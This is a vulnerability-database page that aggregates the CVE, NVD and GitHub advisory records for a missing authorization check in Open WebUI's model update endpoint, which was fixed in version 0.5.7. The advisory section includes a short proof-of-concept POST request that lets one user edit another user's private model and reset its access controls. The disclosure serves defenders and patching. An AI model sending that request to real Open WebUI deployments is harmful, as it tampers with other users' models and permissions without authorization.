CVE-2026-45345 (GCVE-0-2026-45345)
Vulnerability from cvelistv5 – Published: 2026-05-15 21:17 – Updated: 2026-05-18 15:51
VLAI?
Title
Open WebUI: Missing authorization check at the model update function - models from other users can be updated
Summary
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.5.7, a user can modify another user's model even if its visibility is set to Private. By changing the access permissions during editing, unauthorized access can be gained. This vulnerability is fixed in 0.5.7.
Severity ?
6.5 (Medium)
CWE
- CWE-285 - Improper Authorization
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://github.com/open-webui/open-webui/security… | x_refsource_CONFIRM |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| open-webui | open-webui |
Affected:
< 0.5.7
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-45345",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-18T15:50:37.428237Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-18T15:51:06.751Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-gm54-m39w-grjp"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "open-webui",
"vendor": "open-webui",
"versions": [
{
"status": "affected",
"version": "\u003c 0.5.7"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.5.7, a user can modify another user\u0027s model even if its visibility is set to Private. By changing the access permissions during editing, unauthorized access can be gained. This vulnerability is fixed in 0.5.7."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-285",
"description": "CWE-285: Improper Authorization",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-15T21:17:27.335Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/open-webui/open-webui/security/advisories/GHSA-gm54-m39w-grjp",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-gm54-m39w-grjp"
}
],
"source": {
"advisory": "GHSA-gm54-m39w-grjp",
"discovery": "UNKNOWN"
},
"title": "Open WebUI: Missing authorization check at the model update function - models from other users can be updated"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-45345",
"datePublished": "2026-05-15T21:17:27.335Z",
"dateReserved": "2026-05-11T21:40:08.177Z",
"dateUpdated": "2026-05-18T15:51:06.751Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-45345",
"date": "2026-05-24",
"epss": "0.0003",
"percentile": "0.09032"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-45345\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-15T22:16:54.923\",\"lastModified\":\"2026-05-18T19:32:29.047\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.5.7, a user can modify another user\u0027s model even if its visibility is set to Private. By changing the access permissions during editing, unauthorized access can be gained. This vulnerability is fixed in 0.5.7.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-285\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"0.5.7\",\"matchCriteriaId\":\"EA48F4A8-5927-47CD-8AE1-BC3985BC48AE\"}]}]}],\"references\":[{\"url\":\"https://github.com/open-webui/open-webui/security/advisories/GHSA-gm54-m39w-grjp\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/open-webui/open-webui/security/advisories/GHSA-gm54-m39w-grjp\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-45345\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-18T15:50:37.428237Z\"}}}], \"references\": [{\"url\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-gm54-m39w-grjp\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-18T15:49:10.681Z\"}}], \"cna\": {\"title\": \"Open WebUI: Missing authorization check at the model update function - models from other users can be updated\", \"source\": {\"advisory\": \"GHSA-gm54-m39w-grjp\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 6.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"open-webui\", \"product\": \"open-webui\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.5.7\"}]}], \"references\": [{\"url\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-gm54-m39w-grjp\", \"name\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-gm54-m39w-grjp\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.5.7, a user can modify another user\u0027s model even if its visibility is set to Private. By changing the access permissions during editing, unauthorized access can be gained. This vulnerability is fixed in 0.5.7.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-285\", \"description\": \"CWE-285: Improper Authorization\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-15T21:17:27.335Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-45345\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-18T15:51:06.751Z\", \"dateReserved\": \"2026-05-11T21:40:08.177Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-15T21:17:27.335Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-45345
Vulnerability from fkie_nvd - Published: 2026-05-15 22:16 - Updated: 2026-05-18 19:32
Severity ?
Summary
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.5.7, a user can modify another user's model even if its visibility is set to Private. By changing the access permissions during editing, unauthorized access can be gained. This vulnerability is fixed in 0.5.7.
References
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/open-webui/open-webui/security/advisories/GHSA-gm54-m39w-grjp | Exploit, Vendor Advisory | |
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://github.com/open-webui/open-webui/security/advisories/GHSA-gm54-m39w-grjp | Exploit, Vendor Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| openwebui | open_webui | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EA48F4A8-5927-47CD-8AE1-BC3985BC48AE",
"versionEndExcluding": "0.5.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.5.7, a user can modify another user\u0027s model even if its visibility is set to Private. By changing the access permissions during editing, unauthorized access can be gained. This vulnerability is fixed in 0.5.7."
}
],
"id": "CVE-2026-45345",
"lastModified": "2026-05-18T19:32:29.047",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-05-15T22:16:54.923",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-gm54-m39w-grjp"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-gm54-m39w-grjp"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-285"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-GM54-M39W-GRJP
Vulnerability from github – Published: 2026-05-14 20:21 – Updated: 2026-05-19 15:59
VLAI?
Summary
Open WebUI missing authorization check at the model update function - models from other users can be updated
Details
Summary
A user can modify another user's model even if its visibility is set to Private.
The finding resulted from a penetration test for a customer. It is suspected that the root cause of the issue lies within the core of Open WebUI, which is why it is being reported as a security issue here. Tested on Open WebUI 0.5.4.
Details / PoC
The user Victim created a private model with the visibility set to private:
The user Attacker can edit this model using the following POST request:
POST /api/v1/models/model/update?id=aaabraaa HTTP/2
Host: domain.local
//Some headers removed
Te: trailers
{"id":"aaabraaa","base_model_id":"gpt-4o-POC","name":"testmodel","meta":{"profile_image_url":"/static/favicon.png","description":"","capabilities":{"vision":true,"usage":false,"citations":true},"suggestion_prompts":null,"tags":[],"toolIds":["test"]},"params":{},"user_id":"565c82e6-083f-42bb-bf0f-a4e214cfb9ad","access_control":{"read":{"group_ids":[],"user_ids":[]},"write":{"group_ids":[],"user_ids":[]}},"is_active":true,"updated_at":1737314575,"created_at":1737121281}
Request / Response
Impact
A user can modify another user's model even if its visibility is set to Private. By changing the access permissions during editing, unauthorized access can be gained.
Severity ?
6.5 (Medium)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.5.6"
},
"package": {
"ecosystem": "PyPI",
"name": "open-webui"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.5.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-45345"
],
"database_specific": {
"cwe_ids": [
"CWE-285"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-14T20:21:38Z",
"nvd_published_at": "2026-05-15T22:16:54Z",
"severity": "MODERATE"
},
"details": "### Summary\nA user can modify another user\u0027s model even if its visibility is set to `Private`.\nThe finding resulted from a penetration test for a customer. It is suspected that the root cause of the issue lies within the core of Open WebUI, which is why it is being reported as a security issue here. Tested on Open WebUI 0.5.4.\n\n### Details / PoC\nThe user `Victim` created a private model with the visibility set to `private`: \n\n\nThe user `Attacker` can edit this model using the following POST request:\n```\nPOST /api/v1/models/model/update?id=aaabraaa HTTP/2\nHost: domain.local\n//Some headers removed\nTe: trailers\n\n{\"id\":\"aaabraaa\",\"base_model_id\":\"gpt-4o-POC\",\"name\":\"testmodel\",\"meta\":{\"profile_image_url\":\"/static/favicon.png\",\"description\":\"\",\"capabilities\":{\"vision\":true,\"usage\":false,\"citations\":true},\"suggestion_prompts\":null,\"tags\":[],\"toolIds\":[\"test\"]},\"params\":{},\"user_id\":\"565c82e6-083f-42bb-bf0f-a4e214cfb9ad\",\"access_control\":{\"read\":{\"group_ids\":[],\"user_ids\":[]},\"write\":{\"group_ids\":[],\"user_ids\":[]}},\"is_active\":true,\"updated_at\":1737314575,\"created_at\":1737121281}\n```\nRequest / Response\n\n\n### Impact\nA user can modify another user\u0027s model even if its visibility is set to `Private`. By changing the access permissions during editing, unauthorized access can be gained.",
"id": "GHSA-gm54-m39w-grjp",
"modified": "2026-05-19T15:59:21Z",
"published": "2026-05-14T20:21:38Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-gm54-m39w-grjp"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45345"
},
{
"type": "PACKAGE",
"url": "https://github.com/open-webui/open-webui"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Open WebUI missing authorization check at the model update function - models from other users can be updated"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…